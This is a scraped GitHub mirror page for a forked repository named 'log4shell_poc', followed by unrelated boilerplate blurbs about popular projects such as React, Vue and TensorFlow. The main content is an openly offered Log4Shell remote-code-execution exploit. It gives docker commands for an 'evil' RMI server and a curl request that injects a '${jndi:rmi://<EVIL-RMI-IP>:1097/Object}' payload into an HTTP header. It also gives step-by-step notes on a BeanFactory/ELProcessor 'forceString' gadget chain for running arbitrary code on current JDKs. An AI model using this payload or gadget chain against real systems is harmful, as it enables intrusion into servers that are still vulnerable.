jermainlaforce / log4shell_poc Goto Github PK
View Code? Open in Web Editor NEWThis project forked from drahosj/log4shell_poc
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.
This project forked from drahosj/log4shell_poc
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.
$ docker build -t evil:latest . $ docker run -p 1097:1097 evil:latest //////// # vulnerable application container is also running $ curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:rmi://<EVIL-RMI-IP>:1097/Object}' https://github.com/drahosj/log4shell-vulnerable-app credit: https://www.veracode.com/blog/research/exploiting-jndi-injections-java /////// Actual notes: Uses the technique (BeanFactory + ELProcessor + "forceString") highlighted in https://www.veracode.com/blog/research/exploiting-jndi-injections-java. The tl;dr on that: 1. A ResourceRef overrides the normal JNDI reference behavior with a set of key=value pairs intended to populate a Bean via setters 2. Java stil lets you specify a custom factor, if that factory is in the classpath. 3. BeanFactory works with ResourceRefs to call the setters and populate the new bean. 4. the forceString directive in a ResourceRef lets you override the name of a setter from setFoo to anything you want; when assigning foo it will call that name. 5. the ELProcessor class works as a gadget, since its eval method is a valid bean setter (though named incorrectly). 6. Create a forceString rule to set "x" by calling "eval" - x doesn't even have to be a real field of ELProcessor 7. Try to set x to a string 8. BeanFactory calls ELProcessor.eval() on the string, because forceString makes eval() the setter for x 9. Execute arbitrary EL Other gadget classes probably exist. This demo only works against a patched version of the vulnerable app that hacks the gadget classes into the classpath. Note that it's not entirely unreasonable for the relevant jars to be included - any full tomcat deployment (not just spring-boot's embedded tomcat) will definitely have them. - A note on Java versions Using gadgets seems to be possible even on the most current java, and the gadgets still exist on current versions of stuff. This compiles with a slightly older JDK just to avoid problems with the "internal and proprietary" ReferenceWrapper class. Recent JDKs really complain about that a lot - easiest solution is to just stick to one that doesn't.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.